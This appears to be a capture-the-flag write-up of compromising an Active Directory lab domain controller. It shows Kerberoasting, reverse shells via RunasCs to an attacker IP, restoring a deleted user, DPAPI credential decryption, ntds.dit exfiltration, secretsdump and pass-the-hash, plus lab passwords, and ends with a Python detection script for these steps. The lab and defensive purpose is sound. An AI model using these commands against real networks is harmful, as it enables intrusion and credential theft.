# Lessons Learned

- Recheck SMB shares with every new user
- When encountering errors with, e.g., SMB access, cycle through multiple tools: `smbclient`, `evil-winrm`, `smbclient.py`
- If having issues pulling files from an SMB share or the like after confirming that we have access, check the inbound file perms > may need to `chmod 777 .`
- Deleted users: Always be on the lookout for clues associated with deleted users, as they can be revived
- Always look for hidden files and dirs
```powershell
Get-ChildItem -Path "\users\todd.wolfe" -Force
tree \users\todd.wolfe\AppData\Roaming\Microsoft /f /a
tree \users\todd.wolfe\AppData\Local\Microsoft /f /a
```
- Kerberos Enabled & NTLM Disabled: an `NTLM:False` message and a `STATUS_NOT_SUPPORTED` error when using known creds with `nxc smb` indicate we need to use Kerberos
- When interacting with Kerberos, clock skew matters greatly
- When interacting with Kerberos, use the `-k` flag with `nxc` commands
- When interacting with Kerberos, use the FQDN for the DC
- Abuse WriteSPN with `targetedKerberoast.py`
- Use `kinit` to request a TGT from the KDC for a specified user
- `/etc/krb5.conf` specifies the KDC and realm, so there is no need to include the domain or DC IP
- TGTs are kept in the cache file shown by `klist`, e.g., `/tmp/krb5cc_1000`
- Alternatively, we can use `impacket-getTGT`
```bash
kinit username
klist
export KRB5CCNAME=/tmp/krb5cc_1000  # !!only do once per session!!
```
- Generate Kerberos config file
```bash
nxc smb dc.voleur.htb --generate-krb5-file voleur.krb
sudo cp voleur.krb /etc/krb5.conf
```
- IMPORTANT: `RunasCs.exe` is a great stand-in for `su` on Windows machines
- Can also be used to generate a revshell as the substitute user
```powershell
.\RunasCs.exe username password powershell.exe -r kali_IP:port
```
- Always a good idea to check for the DPAPI master key and creds file
```powershell
C:\Users\username\AppData\Roaming\Microsoft\Protect\sid\   # default user-specific master key binary location
C:\Users\username\AppData\Local\Microsoft\Credentials\     # creds blob location
C:\Users\username\AppData\Roaming\Microsoft\Credentials\   # creds blob location
```
- Use `dpapi.py` to decrypt the master key binary and recover the creds blob
```bash
dpapi.py masterkey -file master_key_file_name -sid sid -password password
dpapi.py credential -file creds_file_name -key decrypted_master_key
```

---

# After-Action Attack Sequence - Kerberos Only Box

- Enumerate SMB shares with given creds
- Find encrypted XLSX file in IT share
- Extract hash with `office2john` and crack
- Here we find indications of a deleted user (`todd.wolfe`) and creds for `svc_ldap` and `svc_iis`
- After running BloodHound, we find the following:
  - `svc_ldap` is a member of the `Restore_Users` group, which may be handy to restore `todd.wolfe`
  - `svc_ldap` can `WriteSPN` for `svc_winrm`, who is a member of `Remote Management Users`
- Perform a targeted Kerberoasting attack on `svc_winrm` and open a session as `svc_winrm` using `evil-winrm`
- Use `RunasCs.exe` to spawn a revshell as `svc_ldap`
- From here we can restore `todd.wolfe`
- Use `RunasCs.exe` again to spawn a revshell as `todd.wolfe`
- Run `WinPEAS.exe` to find the DPAPI master key and creds file
- Exfil with `smbclient` and open with `dpapi.py`
- Now we have creds for `jeremy.combs`, who is a member of `Remote Management Users`
- Open a session as `jeremy.combs` using `evil-winrm`
- Find mysterious `id_rsa` in IT share
- SSH connect as `svc_backup`
using the found `id_rsa`
- This drops us into WSL
- Navigate to the Windows filesystem in `/mnt/c`
- Here we find a previously inaccessible `Backups` directory in the IT share that includes `ntds.dit` and the SYSTEM+SECURITY hives
- Exfil with `scp`
- Run `impacket-secretsdump` to extract the Administrator's NT hash
- PtH with `evil-winrm` to get a shell on the DC as `Administrator`

---

# Discover Ports & Services

- `ping` test
![[images/Pasted image 20260320204221.png]]
- `nmap` scan - light > looks like a DC
![[images/Pasted image 20260320204441.png]]
- `nmap` scan - detailed
![[images/Pasted image 20260320205005.png]]
- Note: material clock skew
- Update `/etc/hosts`

---

# Port 445 (SMB) Enum

## Review given creds

- Confirm access
![[images/Pasted image 20260320205755.png]]
![[images/Pasted image 20260320205804.png]]
- `NTLM:False` and `STATUS_NOT_SUPPORTED` indicate we need to use Kerberos
- Use `faketime` and the `-k` flag with `nxc`
```bash
faketime "$(ntpdate -q dc.voleur.htb | cut -d ' ' -f 1,2)" nxc smb dc.voleur.htb -u ryan.naylor -p "HollowOct31Nyt" -k
```
![[images/Pasted image 20260320210818.png]]

## Password Policy

![[images/Pasted image 20260320210928.png]]

## Shares

- Enum shares
![[images/Pasted image 20260320210954.png]]
- Check out IT share
- Running into errors with `smbclient`
- Update `/etc/krb5.conf` > more errors
- Fall back to using `nxc smb [...] -M spider_plus`
```bash
faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" nxc smb dc.voleur.htb -u ryan.naylor -p "HollowOct31Nyt" -k -M spider_plus
```
![[images/Pasted image 20260320212123.png]]
- Look at JSON output
![[images/Pasted image 20260320212229.png]]
- Try to grab `Access_Review.xlsx` with `--get-file` > access denied
```bash
faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" nxc smb dc.voleur.htb -u ryan.naylor -p "HollowOct31Nyt" -k --get-file \\IT\\'first-line support'\\Access_Review.xlsx Access_Review.xlsx
```
![[images/Pasted image 20260320212919.png]]
- Try again with the `--share` flag
```bash
faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" nxc smb dc.voleur.htb -u ryan.naylor -p "HollowOct31Nyt" -k --share IT --get-file 'first-line support'\\Access_Review.xlsx Access_Review.xlsx
```
![[images/Pasted image 20260320213334.png]]
- Run `office2john` and crack the associated hash with `john` > BAM!
![[images/Pasted image 20260320213559.png]]
- Install `libreoffice` and open > names and three passwords
![[images/Pasted image 20260320214353.png]]
- Add disclosures to `creds.txt`

## Users

- Enum users
![[images/Pasted image 20260320214716.png]]
![[images/Pasted image 20260320214701.png]]
- Create `users.txt`
![[images/Pasted image 20260320214922.png]]

---

# AD Enum

## ASREP Roasting

```bash
faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" nxc ldap dc.voleur.htb -d voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --asreproast out
```
![[images/Pasted image 20260321150345.png]]
![[images/Pasted image 20260321150416.png]]

## Kerberoasting

```bash
faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" nxc ldap dc.voleur.htb -d voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --kerberoasting out
```
![[images/Pasted image 20260321150535.png]]

## ADCS

```bash
faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" nxc ldap dc.voleur.htb -d voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k -M adcs
```
![[images/Pasted image 20260321150612.png]]

## BloodHound

- Run remote ingestor
```bash
faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" /opt/rusthound-ce -d voleur.htb -f dc.voleur.htb -u [email protected] -p 'HollowOct31Nyt' -k -z
```
![[images/Pasted image 20260321151118.png]]
- Update `/etc/krb5.conf`
![[images/Pasted image 20260321152841.png]]
- Run `kinit` and `klist`, then `export KRB5CCNAME`
```bash
kinit ryan.naylor
klist
export KRB5CCNAME=./ryan.naylor.ccache
```
![[images/Pasted image 20260321153531.png]]
- Still getting errors
![[images/Pasted image 20260321154051.png]]
- Note: After looking into this later, the issue was too many arguments; instead, simply issue:
```bash
rusthound-ce -d domain -u username -p password -z
```
- Try running `bloodhound-python`
- This works even though the fidelity of the info will be low
```bash
faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" bloodhound-python -u 'ryan.naylor' -p 'HollowOct31Nyt' -dc dc.voleur.htb -d voleur.htb -ns 10.129.7.133 -c all --zip
```
- Spin up the container for the BloodHound GUI
```bash
cd /opt/bloodhound
docker compose up -d
```

---

# AD Attack Chain Prep

- Run the `Shortest paths from Owned objects` cypher query
![[images/Pasted image 20260321155442.png]]
- `svc_iis` and `ryan.naylor` look like dead-ends > no outbound object control
- Also cannot resolve `todd.wolfe`
- `svc_ldap` has paths to `svc_winrm` and `lacey.miller`
![[images/Pasted image 20260321155228.png]]
- Looks like we should create an SPN for `svc_winrm` and kerberoast as `svc_ldap` so we can PtH as `svc_winrm`
- Once we get an interactive session on the box, let's run `sharphound` > I don't trust this as being the complete picture based on past experience with `bloodhound-python`

---

# AD Attack Chain

## Lateral movement to `svc_winrm`

- First, add an SPN for `svc_winrm`
- Getting an `invalidCredentials` error > maybe because we don't have the right krb set
```bash
faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" bloodyAD --dc-ip 10.129.7.133 -d voleur.htb -u svc_ldap -p "password" set object svc_winrm servicePrincipalName -v 'pwn/pwn'
```
![[images/Pasted image 20260321162138.png]]
- Try `kinit` then `export KRB5CCNAME`
```bash
kinit svc_ldap
klist
export KRB5CCNAME=./svc_ldap.ccache
```
![[images/Pasted image 20260321162305.png]]
- Run `bloodyAD` again
- Now I'm getting a `get_TGS` error
```bash
faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" bloodyAD --dc-ip 10.129.7.133 -d voleur.htb -u svc_ldap -p "password" -k set object svc_winrm servicePrincipalName -v 'pwn/pwn'
```
![[images/Pasted image 20260321162409.png]]
- Let's try using `impacket-getTGT`
```bash
faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" impacket-getTGT voleur.htb/svc_ldap:password
```
![[images/Pasted image 20260321162533.png]]
- Now `export KRB5CCNAME` and run `targetedKerberoast.py`
- This gives us the TGS hashes for `lacey.miller` and `svc_winrm`
```bash
export KRB5CCNAME=./svc_ldap.ccache
faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" /opt/targetedKerberoast.py -d voleur.htb -k --no-pass --dc-host dc.voleur.htb
```
![[images/Pasted image 20260321163116.png]]
- Crack the type 23 hash (RC4) for `svc_winrm`
- Cracked!
- Add to `creds.txt`

## Shell as `svc_winrm`

- Reset the location for `KRB5CCNAME` to the default
```bash
export KRB5CCNAME=/tmp/krb5cc_1000
```
- Use `kinit` to generate a ticket for `svc_winrm`
```bash
kinit svc_winrm
klist
```
![[images/Pasted image 20260321190736.png]]
- Connect with `evil-winrm`
- Make sure to use the FQDN for the DC and specify the realm (aka domain)
- This will use the ticket for `svc_winrm`
```bash
evil-winrm -i dc.voleur.htb -r voleur.htb
```
![[images/Pasted image 20260321190929.png]]
- Light internal enum
![[images/Pasted image 20260321201223.png]]
![[images/Pasted image 20260321201306.png]]
- We cannot access the `todd.wolfe` or HR dirs
- Move `SharpHound.exe` to the target and exfil the data
```powershell
upload SharpHound.exe
.\SharpHound.exe -c All
download 20260322004120_BloodHound.zip
```
- Ingest with BloodHound
- We saw that the `todd.wolfe` user was deleted
- Cannot find `todd.wolfe`, but we do see that `svc_ldap` is a member of the `restore_users` group
![[images/Pasted image 20260321195550.png]]
- Check the Recycle Bin and for Deleted Objects
```powershell
Import-Module ActiveDirectory
Get-ADOptionalFeature 'Recycle Bin Feature'
Get-ADObject -Filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects -Properties samaccountname,displayname,objectsid,whenchanged
```
![[images/Pasted image 20260321195204.png]]
- Try another way
```powershell
$deletedObjects = Get-ADObject -IncludeDeletedObjects -Filter 'isDeleted -eq $true' -Properties * -ErrorAction Stop
$deletedObjects | Select-Object Name, DistinguishedName, ObjectClass, whenChanged, LastKnownParent | Format-Table -AutoSize
```
![[images/Pasted image 20260321195506.png]]

## Shell as `svc_ldap`

- Move `RunasCs.exe` to the target (new version)
- [antonioCoco/RunasCs: RunasCs - Csharp and open version of windows builtin runas.exe](https://github.com/antonioCoco/RunasCs)
- Open a revshell as `svc_ldap`
```powershell
.\RunasCs.exe svc_ldap password powershell.exe -r 10.10.14.197:443
```
- Bam!
![[images/Pasted image 20260321202236.png]]
- Now let's check the Recycle Bin and Deleted Objects
```powershell
Import-Module ActiveDirectory
Get-ADOptionalFeature 'Recycle Bin Feature'
Get-ADObject -Filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects -Properties samaccountname,displayname,objectsid,whenchanged
```
- Now we have the SID and the GUID for `todd.wolfe`
![[images/Pasted image 20260321202353.png]]
- Restore `todd.wolfe` using the GUID and confirm
```powershell
Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db
Get-ADUser todd.wolfe
```
![[images/Pasted image 20260321202517.png]]

### Run `SharpHound` again as `svc_winrm`

- We need to enum `todd.wolfe` and who can control him
- Similar info to what we saw before > `Restore_Users`
![[images/Pasted image 20260321203353.png]]
- `todd.wolfe` is a member of `Remote Management Users` > maybe we can find something in his user dir
- Try using the password we gathered earlier with `RunasCs.exe` again

## Shell as `todd.wolfe`

- Use `RunasCs.exe` from `svc_winrm` to open a revshell as `todd.wolfe`
```powershell
.\RunasCs.exe todd.wolfe NightT1meP1dg3on14 powershell.exe -r 10.10.14.197:9443
```
- We have a PowerShell session as `todd.wolfe` > back from the dead!
![[images/Pasted image 20260322151134.png]]
- Show hidden dirs
```powershell
Get-ChildItem -Path "C:\users\todd.wolfe" -Force
```
![[images/Pasted image 20260322151153.png]]
- Look for DPAPI goodies in:
```powershell
dir \users\todd.wolfe\appdata\roaming\microsoft\credentials
dir \users\todd.wolfe\appdata\local\microsoft\credentials
dir \users\todd.wolfe\appdata\roaming\microsoft\protect
```
![[images/Pasted image 20260322151954.png]]

### Exfil DPAPI goodies with `evil-winrm`

- Since `todd.wolfe` is in the `Remote Management Users` group, let's open a shell via `evil-winrm` for easy download
```bash
kinit todd.wolfe
klist
evil-winrm -i dc.voleur.htb -r voleur.htb
```
- Getting some errors
![[images/Pasted image 20260322152510.png]]
- Note: After further review, we could have made this work with the following command
```bash
KRB5CCNAME=/tmp/krb5cc_1000 evil-winrm -i dc.voleur.htb -r voleur.htb
```

### Exfil DPAPI goodies with `smbclient`

- Let's try via `smbclient`
```bash
smbclient -U 'voleur.htb/todd.wolfe%NightT1meP1dg3on14' --realm=voleur.htb //dc.voleur.htb/IT
```
![[images/Pasted image 20260322154017.png]]
- Get the credentials blob
- Having issues with `smbclient` > cannot open the local file > ends up being an outbound directory perms issue; needed to `chmod 777 .`
```bash
get "Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3"
```
![[images/Pasted image 20260322200323.png]]

### Exfil DPAPI goodies with `smbclient.py`

- Try with `smbclient.py`
```bash
kinit todd.wolfe
klist
export KRB5CCNAME=/tmp/krb5cc_1000
faketime "$(ntpdate -q 10.129.232.130 | cut -d ' ' -f 1,2)" smbclient.py -k dc.voleur.htb
```
![[images/Pasted image 20260322200410.png]]
- Get the credentials blob
![[images/Pasted image 20260322202010.png]]
- Get the master key binary
![[images/Pasted image 20260322200917.png]]
- Use `dpapi.py` > we have the password for `jeremy.combs`
```bash
dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14
dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
```
![[images/Pasted image 20260322202140.png]]
- `jeremy.combs` is a member of `Third-Line Technicians` and `Remote Management Users`
![[images/Pasted image 20260322202549.png]]

## Shell as `jeremy.combs`

- Connect with `evil-winrm`
```bash
kinit jeremy.combs
klist
evil-winrm -i dc.voleur.htb -r voleur.htb
```
![[images/Pasted image 20260322202907.png]]
- Look at home dir > nothing
```powershell
tree . /f /a
```
![[images/Pasted image 20260322203019.png]]
- Enumerate SMB access with `nxc smb`
```bash
faketime "$(ntpdate -q 10.129.232.130 | cut -d ' ' -f 1,2)" nxc smb dc.voleur.htb -u jeremy.combs -p "password" -k --shares
```
![[images/Pasted image 20260322203450.png]]
- Connect to the IT share with `smbclient`
```bash
smbclient -U 'voleur.htb/jeremy.combs%password' --realm=voleur.htb //dc.voleur.htb/IT
```
![[images/Pasted image 20260322203525.png]]
- We find an `id_rsa` > exfil these files
![[images/Pasted image 20260322203612.png]]

## Shell as `svc_backup`

- View the note
![[images/Pasted image 20260322203650.png]]
- Interesting - Windows Subsystem for Linux (WSL) is enabled
- `id_rsa` must be for `svc_backup`, as the XLSX we recovered earlier mentioned this account
- Connect via SSH
- Note: the initial `nmap` noted that port 2222 was open
```bash
sudo chmod 600 id_rsa
ssh -i id_rsa [email protected] -p 2222
```
- Light internal enum
![[images/Pasted image 20260322204022.png]]
- Based on the `sudo -l` output, we can immediately elevate ourselves to root
- But we are stuck in WSL
![[images/Pasted image 20260322204137.png]]
- With WSL, the Windows directory is located in `/mnt/c`
![[images/Pasted image 20260322204227.png]]
- As either `root` or `svc_backup`, we cannot access `/mnt/c/Users/Administrator`
![[images/Pasted image 20260322204509.png]]
- `HR` and `Finance` shares are empty, and so is `Recovery`
![[images/Pasted image 20260322204652.png]]
- The IT share has a `Backups` dir within `Third-Line Support` that we couldn't see before
- `ntds.dit` inside
![[images/Pasted image 20260322204856.png]]

---

# Escalate to Administrator

## Exfil `ntds.dit`

- Grab the contents (including `ntds.dit`) with `scp` since we have SSH access
```bash
scp -i id_rsa -P 2222 -r "[email protected]:/mnt/c/IT/Third-Line Support/Backups" ./
```
- Confirm that we have the necessary files
![[images/Pasted image 20260322205136.png]]
- Run `impacket-secretsdump`
```bash
impacket-secretsdump -ntds "Active Directory"/ntds.dit -system registry/SYSTEM -security registry/SECURITY LOCAL
```
![[images/Pasted image 20260322205627.png]]

## PtH for Administrator

- Try with `psexec.py`
- Note: Not sure how to make `evil-winrm` work, as we don't have the cleartext password to request a TGT with `kinit`
```bash
faketime "$(ntpdate -q 10.129.232.130 | cut -d ' ' -f 1,2)" psexec.py voleur.htb/[email protected] -no-pass -hashes :nthash -k
```
- There we GO!
![[images/Pasted image 20260322205909.png]]
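For the defender's view of the chain above (the `servicePrincipalName` write on `svc_winrm`, the RC4 service ticket that was later cracked, and the `Restore-ADObject` of `todd.wolfe`), here is an added detection example that is not part of the original notes: it runs three rules over constructed Windows Security events in JSON-lines form. The event IDs are the standard ones (5136 object modified, 4769 service ticket requested, 5138 object undeleted) and the field names follow those event schemas, but the records themselves are made up for this example, reusing the account names from the walkthrough and the attacker IP shown in the `RunasCs.exe` commands.

```python
import json

# Constructed sample events shaped like exported Security log entries (not captured
# from the box). Account names and the 10.10.14.197 address come from the walkthrough.
SAMPLE_LOG = """
{"EventID": 5136, "SubjectUserName": "svc_ldap", "ObjectClass": "user", "ObjectDN": "CN=svc_winrm,CN=Users,DC=voleur,DC=htb", "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "pwn/pwn"}
{"EventID": 4769, "TargetUserName": "svc_ldap@VOLEUR.HTB", "ServiceName": "svc_winrm", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.197"}
{"EventID": 4769, "TargetUserName": "DC$@VOLEUR.HTB", "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.129.7.133"}
{"EventID": 5138, "SubjectUserName": "svc_ldap", "ObjectClass": "user", "ObjectDN": "CN=todd.wolfe,CN=Users,DC=voleur,DC=htb"}
""".strip()


def spn_written_on_user(ev):
    """5136 setting servicePrincipalName on a user object: the WriteSPN precursor to a targeted kerberoast."""
    return (ev.get("EventID") == 5136 and ev.get("ObjectClass") == "user"
            and str(ev.get("AttributeLDAPDisplayName", "")).lower() == "serviceprincipalname")


def rc4_tgs_for_user(ev):
    """4769 with RC4 (0x17, the 'type 23' hash) for a non-machine service: classic kerberoast signal."""
    if ev.get("EventID") != 4769 or str(ev.get("TicketEncryptionType", "")).lower() != "0x17":
        return False
    svc = str(ev.get("ServiceName", ""))
    return not svc.endswith("$") and svc.lower() != "krbtgt"


def user_undeleted(ev):
    """5138: an object came back from the AD Recycle Bin; a revived user account deserves review."""
    return ev.get("EventID") == 5138 and ev.get("ObjectClass") == "user"


RULES = {
    "spn-written-on-user": spn_written_on_user,
    "rc4-tgs-for-user-service": rc4_tgs_for_user,
    "user-object-undeleted": user_undeleted,
}


def detect(lines):
    """Parse JSON-lines events and return (rule, actor, object) tuples for every rule that fires."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records rather than abort the whole scan
        actor = ev.get("SubjectUserName") or ev.get("TargetUserName")
        target = ev.get("ObjectDN") or ev.get("ServiceName")
        hits.extend((name, actor, target) for name, rule in RULES.items() if rule(ev))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG.splitlines()):
        print(*hit)
```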